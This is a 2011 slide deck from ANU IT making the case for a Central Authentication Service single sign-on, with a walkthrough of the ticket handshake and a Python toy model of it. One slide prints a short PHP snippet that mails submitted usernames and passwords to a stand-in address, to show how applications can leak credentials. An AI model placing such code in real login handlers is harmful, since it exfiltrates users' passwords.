A Central Authentication Service for ANU




      Steve Swinsburg
      Java Team Leader
      Information Technology Infrastructure, ANU
      March 2011

Thursday, 31 March 2011
Overview
     • Why do we need single sign on?
     • Security issues with current approaches to
       user authentication
     • The architecture of CAS
     • How you can implement it
     • Demo
     • Future possibilities

Pop quiz
     • Same sign on, single sign on: it’s all the same
       thing, right?
     • We plug our authentication into LDAP, isn’t
       that enough?



                          NO!
Why do we need single sign on?
     • User Convenience
           – User only needs to log in once per browser
             session
           – Seamless login to multiple participating web
             applications
     • Security
           – Applications never touch a user’s password
           – Users have the confidence that their primary
             credentials won’t be leaked by a compromised
             web application.
User Convenience
     • Much simpler experience for users
           – can have one authoritative credential source
                 • we already do this via LDAP
                          – same sign on
                          – can also be a security issue depending on
                            implementation.
           – reduce ‘authentication fatigue’




Security
     • We already have ‘same sign on’
           – Applications use the same authoritative
             source for user credentials - LDAP:

           [Diagram: User -> App 1 / App 2 / App 3 -> LDAP; each application
            takes the password itself and checks it against LDAP]


The Security Issue
     • Each web application’s login form touches
       the user’s password to authenticate the
       user.

     • If just one application is compromised,
       primary credentials are leaked and can be
       used to access every other system.
           – Intrusion, wi-fi sniffing, or even just logging.

This may shock you
     • Credential leaks are not always
       malicious
           – could be unintentional, inexperienced developer, unaware

     • Webapps could be collecting credentials
           – and mailing them, logging them, writing them to a file...



    <?php
    // Deliberately bad, as on the slide: the application's own login form
    // receives the clear-text password and mails it out of the system.
    $uid = $_POST['username'];
    $pwd = $_POST['password'];

    mail('me@somewhere.com', "credentials", "u=$uid,p=$pwd");


The Security Solution
     • Get rid of all application login forms
     • All applications make use of CAS for
       authentication
     • Users no longer present credentials to the
       individual applications
     • If an application is compromised, that’s
       bad, but it will not affect the others: the
       application never held the password, so the
       password cannot be leaked.

The Security Solution
     • Delegated authentication to CAS
           [Diagram: User -> App 1 / App 2 / App 3 -> CAS -> LDAP; the
            applications delegate authentication to CAS, and only CAS
            validates credentials against LDAP]




The Architecture of CAS
     • To the user, it is a single action
           – Login and then get redirected back to the app


     • To the application, it is a series of
       handshakes to ensure security

     • Achieved via filters, clients and modules,
       available for most languages (more on this
       later)
The Architecture of CAS
      [Sequence diagram, reconstructed as numbered steps]
      1. Client visits the app
      2. If the app needs authentication, it redirects the
         client to CAS
            – CAS shows the login form (username, password);
              the form contains a one-use token (LT) to
              prevent form replay
      3. CAS validates the credentials against LDAP
      4. CAS redirects the client back to the app with an
         ST (GET)
      5. The app verifies the ST with CAS (POST)
      6. CAS responds to the app with the user
         authentication result
            – Attribute release via SAML (optional)


The Architecture of CAS
     • Form contains a one-use token (LT)
           – Cannot be replayed (i.e. via the back button)
     • Client receives a cookie (TGT) to allow
       future auto login
           – Tightly scoped (to CAS only)
           – Issued only over SSL
     • Application ST is single use only
           – Cannot be replayed if the URL is captured

How you can implement it
     • Java
           – casclient (the Java CAS client), deployed as a
             servlet filter
     • PHP
           – phpCAS module to obtain the authenticated username
           – automatically handles the redirect to CAS and
             the ticket validation
     • Closed source or vendor apps
           – SAML
           – Custom/modified login module if possible
           – Consult the vendor (!)
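
      The handshake on slides 12 and 13, and the job a client filter or module
      from slide 14 does, as an added worked example. This is not code from the
      slides, from Jasig CAS or from casclient/phpCAS: it is a toy in-memory
      model with both sides of the exchange, so it runs offline. The ticket
      prefixes (LT-, TGT-, ST-), the /login and /serviceValidate endpoints and
      the CAS 2.0 XML bodies follow the public CAS protocol; the hostnames, the
      user u1234567 and its password, and the class and function names are
      assumptions made up for the example.

```python
# Added example, not from the slides or from Jasig CAS: a toy in-memory model of
# the handshake on slides 12-14 with both sides of the exchange. Ticket prefixes,
# endpoint names and the CAS 2.0 XML follow the public CAS protocol; the
# hostnames, the test user and the class names are made up for this example.
import secrets
import xml.etree.ElementTree as ET
from urllib.parse import urlencode, urlparse, parse_qs

CAS_NS = "http://www.yale.edu/tp/cas"


def failure(code, msg):
    """CAS 2.0 failure body, as /serviceValidate returns it."""
    return (f'<cas:serviceResponse xmlns:cas="{CAS_NS}">'
            f'<cas:authenticationFailure code="{code}">{msg}</cas:authenticationFailure>'
            f'</cas:serviceResponse>')


class CasServer:
    """Toy CAS server: one-use LT on the form, TGT for SSO, single-use ST bound to a service."""

    def __init__(self, users, base="https://cas.example.edu/cas"):
        self.base = base
        self.users = users   # username -> password; stands in for the LDAP bind
        self.lts = set()     # login tickets not yet consumed
        self.tgts = {}       # TGT -> username (the browser holds this as a cookie)
        self.sts = {}        # ST -> (username, service it was issued for)

    def login_form(self):
        lt = "LT-" + secrets.token_urlsafe(16)
        self.lts.add(lt)
        return lt

    def login(self, lt, username, password, service):
        """Step 3: only CAS sees the password; a replayed LT (back button) is refused."""
        if lt not in self.lts:
            raise PermissionError("login ticket already used")
        self.lts.discard(lt)
        if self.users.get(username) != password:
            raise PermissionError("bad credentials")
        tgt = "TGT-" + secrets.token_urlsafe(16)
        self.tgts[tgt] = username
        return tgt, self.issue_st(tgt, service)

    def issue_st(self, tgt, service):
        """Step 4: a valid TGT yields a fresh ST and the redirect URL back to the service."""
        st = "ST-" + secrets.token_urlsafe(16)
        self.sts[st] = (self.tgts[tgt], service)
        return service + ("&" if "?" in service else "?") + urlencode({"ticket": st})

    def service_validate(self, ticket, service):
        """Steps 5-6: the ST is consumed on first use and must match its service."""
        entry = self.sts.pop(ticket, None)
        if entry is None:
            return failure("INVALID_TICKET", "ticket not recognized or already used")
        user, bound_service = entry
        if bound_service != service:
            return failure("INVALID_SERVICE", "ticket was issued for a different service")
        return (f'<cas:serviceResponse xmlns:cas="{CAS_NS}"><cas:authenticationSuccess>'
                f'<cas:user>{user}</cas:user></cas:authenticationSuccess></cas:serviceResponse>')


def parse_validation(xml_text):
    """Client side of step 6: username from a /serviceValidate body, or None on failure."""
    root = ET.fromstring(xml_text)
    user = root.find(f"{{{CAS_NS}}}authenticationSuccess/{{{CAS_NS}}}user")
    return user.text if user is not None else None


class CasFilter:
    """The application's side (the role of casclient or phpCAS): it never handles a password."""

    def __init__(self, cas, service):
        self.cas, self.service, self.session = cas, service, {}

    def handle(self, request_url):
        """Returns (status, payload): 302 + CAS login URL, 200 + username, or 403 + None."""
        if "user" in self.session:
            return "200", self.session["user"]
        query = parse_qs(urlparse(request_url).query)
        if "ticket" not in query:  # steps 1-2: no ticket, send the browser to CAS
            return "302", self.cas.base + "/login?" + urlencode({"service": self.service})
        user = parse_validation(self.cas.service_validate(query["ticket"][0], self.service))
        if user is None:
            return "403", None
        self.session["user"] = user
        return "200", user


def run_handshake():
    """Walks the exchange for two applications and records what each side sees."""
    cas = CasServer({"u1234567": "correct horse battery"})  # constructed test user
    app1_url, app2_url = "https://app1.example.edu/", "https://app2.example.edu/"
    app1 = CasFilter(cas, app1_url)
    events = {"redirect": app1.handle(app1_url)}  # steps 1-2
    lt = cas.login_form()
    tgt, callback = cas.login(lt, "u1234567", "correct horse battery", app1_url)  # step 3
    try:
        cas.login(lt, "u1234567", "correct horse battery", app1_url)  # back-button replay
        events["lt_replay"] = "accepted"
    except PermissionError:
        events["lt_replay"] = "rejected"
    events["first_use"] = app1.handle(callback)  # steps 4-6
    events["st_replay"] = CasFilter(cas, app1_url).handle(callback)  # captured URL replayed
    events["sso_app2"] = CasFilter(cas, app2_url).handle(cas.issue_st(tgt, app2_url))
    events["cross_service"] = CasFilter(cas, app1_url).handle(cas.issue_st(tgt, app2_url))
    return events


if __name__ == "__main__":
    for name, outcome in run_handshake().items():
        print(f"{name:14} {outcome}")
```

      Running it shows the properties the slides claim: the LT is refused the
      second time, the ST is refused when the captured callback URL is replayed,
      the TGT lets App 2 get a fresh ST with no password, and an ST issued for
      App 2 is refused when App 1 tries to validate it. In a real deployment the
      filter's validation call is an HTTPS request to the CAS server with
      certificate verification turned on, the service parameter must be exactly
      the URL the application sent on the original redirect, and CAS also
      expires an unused ST after a short time.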
Demo
     • App 1
           – https://jira-test.anu.edu.au


     • App 2
           – https://dev.anu.moodle.netspot.com.au




Future possibilities
     • Potential to restrict LDAP auth once apps
       are CASified
     • Shibboleth is an option for federated
       access across institutions
     • Integration between Shib & CAS so the
       UX is seamless for ANU users
     • PC login can integrate with CAS via
       Kerberos

Questions




      Steve Swinsburg
      Java Team Leader
      Information Technology Infrastructure, ANU